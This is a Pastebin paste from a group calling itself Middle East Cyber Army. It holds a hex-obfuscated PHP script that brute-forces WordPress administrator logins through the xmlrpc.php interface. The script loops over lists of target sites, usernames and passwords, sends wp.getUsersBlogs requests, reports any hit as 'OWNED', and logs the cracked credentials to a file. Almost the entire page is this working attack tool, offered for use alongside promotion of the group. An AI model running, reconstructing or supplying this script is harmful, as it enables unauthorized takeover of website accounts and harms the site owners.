API tools faq
paste
Advertisement
MiddleEastCyberArmy

[PHP] WORDPRESS BRUTEFORCE USING XMLRPC IFACE (2014)

MiddleEastCyberArmy
Aug 17th, 2014
4,136
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.38 KB | None | 0 0
raw download clone embed print report
  1. ==================================================================
  2. YOUTUBE: https://www.youtube.com/channel/UC5DPee5R7vtFytLZAGRNg4A
  3. PAGE: https://www.facebook.com/Middle.East.Cyber.Army.5
  4. TWITTER: https://twitter.com/MiddleEastCybe2
  5. ==================================================================
  6. <?php ${"\x47LO\x42\x41\x4cS"}["\x6e\x66\x62\x79\x66q\x65\x72s\x70v\x63"]="f\x69\x6ce";${"\x47LOB\x41L\x53"}["\x64es\x67\x68\x76\x6a\x6c\x68\x72\x6f\x66"]="\x75se\x72\x5fli\x73\x74";${"G\x4c\x4f\x42\x41\x4cS"}["\x65l\x76\x78\x75\x76\x68s"]="\x73\x69\x74e_\x6c\x69\x73\x74";${"\x47L\x4f\x42A\x4c\x53"}["\x6b\x67\x65r\x69b\x76\x76"]="\x6d\x73\x67";${"G\x4cO\x42A\x4cS"}["x\x76\x72\x76\x6a\x6fb\x6d"]="\x78\x6d\x6c";${"\x47L\x4f\x42\x41\x4c\x53"}["\x71\x69\x6c\x77\x68\x6e\x72\x62p\x6a"]="u\x73r";${"\x47\x4cO\x42\x41L\x53"}["\x65om\x65\x69\x76\x75b"]="\x70\x77";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78\x67\x75xp\x6blx\x75"]="si\x74\x65";${"G\x4c\x4f\x42\x41\x4c\x53"}["e\x71kf\x69\x78j"]="\x63\x68";${"G\x4c\x4f\x42\x41L\x53"}["e\x73lh\x76\x6d\x78\x6fz\x61"]="\x75r\x69";${"\x47L\x4f\x42\x41\x4c\x53"}["c\x74ka\x6cg\x79\x64p\x79\x66"]="\x75s\x65\x72\x5fl\x69st";${"GL\x4f\x42ALS"}["\x65\x6a\x63\x6fq\x76rri\x6b\x66"]="\x77\x6f\x72\x64l\x69\x73t";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75i\x70\x74\x66\x6ey"]="\x75\x73\x72\x73";set_time_limit(0);error_reporting(E_ALL);${"\x47L\x4f\x42\x41L\x53"}["w\x72l\x6b\x7a\x67\x64\x71\x74"]="s\x69\x74\x65\x5f\x6c\x69st";${"\x47\x4c\x4f\x42\x41L\x53"}["it\x74\x6f\x6d\x73u\x79"]="\x73\x69t\x65\x5f\x6c\x69\x73\x74";Class Xmlrpc{var$httpResponse;var$httpinfo;var$log;var$userAgent;var$usrs;var$wordlist;var$uris;var$match;var$header;var$xml;var$timeout;function __construct($uris,$usrs,$wordlist){$vchjitwphdd="u\x72\x69s";$this->uris=${$vchjitwphdd};$this->usrs=${${"G\x4c\x4f\x42\x41L\x53"}["\x75\x69\x70\x74\x66\x6e\x79"]};$this->wordlist=${${"\x47\x4c\x4fB\x41\x4c\x53"}["ej\x63\x6f\x71\x76r\x72\x69\x6b\x66"]};$this->log="\x76alid_\x77p.\x74xt";$this->match="<\x6ea\x6de>\x69\x73\x41\x64min\x3c/\x6e\x61\x6de>";$this->userAgent="M\x6fzi\x6c\x6c\x61/5\x2e\x30 (\x58\x31\x31\x3b\x20\x55bun\x74u\x3b \x4cinu\x78 x\x386_6\x34; \x72\x76:3\x30.0) \x47ec\x6bo/201\x30\x301\x30\x31 F\x69refo\x78/3\x30\x2e\x30";$this->headers=array("C\x6f\x6e\x74\x65\x6et-T\x79p\x65:\x20\x61pp\x6ci\x63\x61t\x69o\x6e/x-\x77ww-\x66o\x72m-u\x72\x6cen\x63od\x65\x64");$this->timeout=10;}function __destruct(){echo"\n\nKEE\x50\x20\x53UPP\x4fR\x54I\x4e\x47 \x55\x53 F\x4fR\x20M\x4f\x52\x45 \x54\x4f\x4fL\x53 :) \x2e\x20(:\n","B\x79 \x54\x48\x45\x20\x47REA\x54\x45\x53T <\x20\x4d\x69ddle\x20\x45ast\x20C\x79\x62er A\x72m\x79\x20(\x4d\x45\x43A) \x3e\n";}function gemXml($usr,$pw){$this->xml="\n\x20 \x20\x20 \x20\x20\x20   <\x6det\x68\x6fd\x43\x61ll>\n  \x20   \x20  \x20  \x20  <me\x74h\x6fd\x4e\x61\x6de>\x77p.\x67\x65\x74U\x73\x65r\x73Bl\x6f\x67s\x3c/\x6de\x74hod\x4eame\x3e\n\x20\x20  \x20  \x20\x20  \x20   \x3cpar\x61m\x73\x3e\n \x20\x20\x20\x20 \x20 \x20 \x20   \x20\x3c\x70\x61r\x61m><\x76\x61lue>\x3cst\x72in\x67>$usr</string\x3e</\x76alue></\x70ar\x61\x6d\x3e\n \x20\x20  \x20  \x20      \x3c\x70\x61\x72a\x6d>\x3cvalu\x65><\x73tring>$pw</str\x69ng></va\x6cue></par\x61m\x3e\n\x20 \x20 \x20\x20\x20   \x20\x3c/\x70\x61ra\x6ds>\x3c/me\x74\x68o\x64Cal\x6c>\n\x20\x20    \x20";return$this->xml;}function is_200($uri){$wbcvvnjjcuf="c\x68";${"GL\x4f\x42\x41LS"}["\x62\x70fs\x6bkj\x71\x6d"]="\x75\x72i";${"G\x4cO\x42\x41L\x53"}["a\x72\x6d\x65nr\x6f\x64\x6e"]="\x63h";$ucyjtduh="c\x68";ob_start();${${"\x47\x4c\x4fB\x41L\x53"}["\x61\x72\x6d\x65\x6e\x72o\x64\x6e"]}=curl_init(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x65sl\x68\x76\x6dx\x6fz\x61"]});curl_setopt(${$wbcvvnjjcuf},CURLOPT_URL,${${"\x47\x4c\x4f\x42\x41L\x53"}["b\x70\x66s\x6b\x6b\x6aq\x6d"]});$this->httpResponse=curl_exec(${$ucyjtduh});$this->httpinfo=curl_getinfo(${${"\x47\x4cOB\x41L\x53"}["e\x71\x6b\x66i\x78\x6a"]});ob_end_clean();if($this->httpinfo["\x68ttp_c\x6f\x64\x65"]==200)return true;return false;}function bruteXml(){$wkwqztcou="\x73it\x65";foreach($this->uris as${$wkwqztcou}){${"GLO\x42\x41L\x53"}["\x65wlmag\x75\x73\x6f"]="\x73\x69t\x65";$npuvayvl="s\x69t\x65";$djlswqivwswy="si\x74\x65";${"\x47L\x4fB\x41\x4cS"}["\x65\x6a\x6cw\x72u\x6d"]="s\x69t\x65";${"\x47\x4c\x4fBAL\x53"}["t\x69q\x77u\x61\x71f\x6c"]="\x73\x69\x74e";if(strstr(${${"\x47L\x4fB\x41\x4c\x53"}["\x65w\x6cmaguso"]},"h\x74\x74ps"))exit("[-] \x48\x74\x74p\x73 \x65\x6e\x76\x20,\x20\x65\x78i\x74i\x6e\x67!");${"G\x4c\x4f\x42\x41\x4cS"}["\x79\x70\x62\x62\x71j\x74"]="\x75\x73\x72";if(!strstr(${${"GL\x4f\x42\x41\x4c\x53"}["\x78\x67\x75\x78\x70kl\x78\x75"]},"\x68\x74\x74p"))${$npuvayvl}="http://".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6a\x6cw\x72\x75\x6d"]};if(!strstr(${${"\x47\x4cO\x42\x41LS"}["\x74\x69q\x77\x75\x61\x71\x66\x6c"]},"\x78mlr\x70c\x2e\x70hp"))${$djlswqivwswy}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78\x67\x75xp\x6b\x6cx\x75"]}."/\x78\x6d\x6c\x72p\x63.p\x68\x70";echo"C\x68\x65cki\x6e\x67 \x69\x66 \x78\x6dl\x72\x70c\x20\x69s av\x61il\x61b\x6c\x65.\x2e\x2e\n";if(!$this->is_200(${${"\x47\x4c\x4f\x42A\x4cS"}["x\x67\x75x\x70\x6blx\x75"]}))exit("X\x6d\x6crp\x63 ifa\x63\x65\x20n\x6ft \x61v\x61\x69\x6c\x61b\x6c\x65 \x66ri\x65nd! Bye\x21\n");echo"[\x4fK][{$site}] B\x72\x75\x74\x69\x6e\x67 vi\x61\x20\x78\x6dlrp\x63\n";foreach($this->usrs as${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x79\x70\x62bq\x6at"]}){foreach($this->wordlist as${${"\x47\x4cO\x42\x41L\x53"}["\x65\x6f\x6d\x65i\x76\x75\x62"]}){${"G\x4cO\x42A\x4cS"}["\x6e\x61\x70\x72\x77d\x6d\x73"]="c\x68";${"GL\x4f\x42\x41\x4cS"}["\x79\x74d\x67\x61\x73a\x72e"]="\x70\x77";$qokrwbwipo="\x75\x73\x72";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6eu\x75w\x69\x63\x63w"]="\x63\x68";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x76\x66h\x64\x67\x68\x6b\x64"]="\x63h";${"\x47\x4c\x4f\x42A\x4c\x53"}["rk\x74cy\x73p\x66\x66"]="ch";$this->gemXml(${$qokrwbwipo},${${"G\x4c\x4fBAL\x53"}["\x65\x6fm\x65\x69vu\x62"]});${"G\x4cO\x42A\x4c\x53"}["\x61\x6ciu\x6f\x61\x76"]="\x63\x68";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x74v\x74k\x71\x68\x62"]="s\x69\x74\x65";${"\x47\x4c\x4f\x42\x41\x4cS"}["o\x61jv\x72\x76\x68\x66"]="\x63\x68";$czwsidn="\x63\x68";${$czwsidn}=curl_init(${${"GL\x4f\x42\x41\x4cS"}["\x74\x76\x74k\x71h\x62"]});curl_setopt(${${"G\x4c\x4f\x42\x41LS"}["nu\x75\x77\x69c\x63\x77"]},CURLOPT_RETURNTRANSFER,1);curl_setopt(${${"GL\x4fB\x41\x4c\x53"}["\x65\x71\x6bf\x69x\x6a"]},CURLOPT_USERAGENT,$this->userAgent);curl_setopt(${${"\x47\x4cOB\x41LS"}["\x61\x6c\x69\x75\x6f\x61\x76"]},CURLOPT_HTTPHEADER,$this->headers);curl_setopt(${${"\x47\x4c\x4fB\x41L\x53"}["\x76\x66\x68\x64\x67\x68\x6b\x64"]},CURLOPT_POST,1);curl_setopt(${${"\x47\x4c\x4f\x42\x41L\x53"}["eqk\x66\x69\x78\x6a"]},CURLOPT_POSTFIELDS,$this->xml);curl_setopt(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65\x71\x6b\x66\x69\x78\x6a"]},CURLOPT_TIMEOUT,$this->timeout);curl_setopt(${${"\x47L\x4fB\x41LS"}["e\x71\x6b\x66i\x78\x6a"]},CURLOPT_CONNECTTIMEOUT,$this->timeout);curl_setopt(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6eap\x72\x77\x64\x6ds"]},CURLOPT_ENCODING,"");$this->httpResponse=curl_exec(${${"\x47\x4c\x4fBAL\x53"}["r\x6b\x74\x63\x79\x73p\x66\x66"]});curl_close(${${"G\x4cO\x42\x41\x4c\x53"}["\x6f\x61\x6a\x76\x72\x76h\x66"]});if(strstr($this->httpResponse,$this->match)){$idancekw="\x70\x77";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73hrb\x65\x77\x6b\x61\x66\x69"]="\x6ds\x67";${"\x47\x4c\x4f\x42\x41LS"}["yy\x66\x6cpo\x67j"]="\x6d\x73\x67";${${"\x47LO\x42A\x4cS"}["\x79yf\x6cpo\x67j"]}=sprintf("[+][O\x57NED \x21\x21\x21] %\x73\x20%s:%\x73\n",${${"G\x4c\x4f\x42\x41L\x53"}["x\x67\x75\x78p\x6b\x6cx\x75"]},${${"\x47\x4cO\x42\x41L\x53"}["\x71\x69l\x77\x68n\x72\x62\x70\x6a"]},${$idancekw});echo${${"\x47LO\x42\x41\x4c\x53"}["\x6bge\x72\x69\x62\x76v"]};file_put_contents($this->log,${${"\x47\x4c\x4fBA\x4c\x53"}["\x73hrb\x65w\x6b\x61\x66\x69"]},FILE_APPEND);exit;}echo sprintf("[-]\x20%\x73 \x25s:\x25s\n",${${"\x47\x4cO\x42\x41\x4c\x53"}["\x78\x67\x75xp\x6bl\x78\x75"]},${${"\x47L\x4f\x42\x41LS"}["\x71i\x6c\x77hnrbpj"]},${${"\x47L\x4f\x42\x41LS"}["\x79\x74\x64\x67a\x73a\x72e"]});}}}}function init(){echo"Wel\x63o\x6d\x65\x20\x74o\x20\x77p \x62r\x75\x74\x65\x20\x66\x6frc\x65\x20vi\x61\x20\x58\x6dl\x72\x70\x63\x20i\x66\x61c\x65.\n";$this->uris=array_filter(explode("\n",file_get_contents($this->uris)));$this->usrs=array_filter(explode("\n",file_get_contents($this->usrs)));$this->wordlist=array_filter(explode("\n",file_get_contents($this->wordlist)));$this->bruteXml();}}${"\x47\x4c\x4f\x42\x41L\x53"}["\x63\x6c\x78\x78i\x7a\x69\x79\x6e"]="w\x6f\x72\x64\x6ci\x73t";echo"\n\x23 \x47re\x65\x74\x27z\x20\x74\x6f:\x20A\x4c\x4c M\x45\x43\x41\x20\x54\x45AM\x20& FA\x4e\x53\n\n\x23\x20\x49\x44EA BY: RODR\x49GO\n\n\x23 CO\x44\x45D\x20BY\x20:\x20\x54H\x45\x20G\x52\x45ATE\x53\x54 ( \x68\x74\x74\x70\x73://w\x77\x77.\x66\x61ce\x62\x6fo\x6b.c\x6fm/\x61l\x6fu\x73h\x691994 )\n\n\x23\x20C\x4f\x44E\x44 IN :\x20Mi\x64\x64\x6ce E\x61st \x43\x79\x62\x65r\x20Ar\x6d\x79 Labs \n\n# \x50\x41GE: htt\x70\x73://\x77\x77w.\x66ac\x65\x62\x6f\x6fk\x2e\x63o\x6d/\x4did\x64l\x65.\x45\x61\x73\x74.\x43\x79\x62\x65r\x2e\x41\x72my\n\n\x23\x20GR\x4f\x55P : \x68\x74tps://\x77w\x77.\x66\x61ceb\x6f\x6fk\x2ec\x6f\x6d/grou\x70\x73/\x4d\x69\x64dle\x2e\x45\x61\x73\x74.\x43y\x62\x65r\x2e\x41\x72\x6dy/\n\n#\x20TW\x49\x54TER: \x68\x74\x74p\x73://\x74w\x69t\x74\x65r.\x63o\x6d/M\x69ddl\x65East\x43\x79\x62\x65r\n     \x20   \x20\x20 \x20  \x20 \x20 \x20 \x20\x20\x20\x20\x20 \x20 \x20\x20\x20 \x20\x20 \x20\x20\x20  \x20\x20 \x20 \x20  \x20\x20\x20 \x20\x20\x20   ","\n\x53i\x74e\x20lis\x74:\x20";${${"\x47\x4c\x4fBA\x4c\x53"}["\x77\x72\x6c\x6b\x7a\x67\x64\x71\x74"]}=trim(fgets(STDIN));echo"\x55\x73er \x6c\x69\x73t:\x20";${"G\x4c\x4f\x42A\x4c\x53"}["\x77\x74i\x6d\x67u\x6d\x66\x66\x70l\x66"]="\x66il\x65";$uyqfjbjljml="\x75s\x65\x72\x5f\x6cist";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x63\x74\x6b\x61\x6cg\x79d\x70\x79\x66"]}=trim(fgets(STDIN));$xqqspuue="wor\x64lis\x74";echo"\x57\x6frd\x6cist:\x20";${${"\x47L\x4fB\x41LS"}["\x63\x6c\x78\x78\x69\x7ai\x79n"]}=trim(fgets(STDIN));foreach(array(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6cv\x78\x75\x76h\x73"]},${${"\x47L\x4f\x42\x41\x4c\x53"}["\x64\x65\x73\x67\x68\x76\x6a\x6ch\x72o\x66"]},${${"\x47\x4cO\x42\x41\x4c\x53"}["\x65\x6a\x63\x6f\x71v\x72rik\x66"]})as${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x74\x69mg\x75\x6d\x66f\x70\x6c\x66"]}){if(!file_exists(${${"\x47L\x4fB\x41\x4c\x53"}["\x6ef\x62y\x66\x71e\x72\x73pv\x63"]}))exit("F\x69\x6c\x65 {$file}\x20\x6eo\x74\x20fo\x75n\x64\x21\n");}${${"GL\x4f\x42\x41\x4c\x53"}["\x78\x76\x72\x76\x6a\x6f\x62\x6d"]}=new Xmlrpc(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x69\x74\x74o\x6d\x73u\x79"]},${$uyqfjbjljml},${$xqqspuue});$xml->init();
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!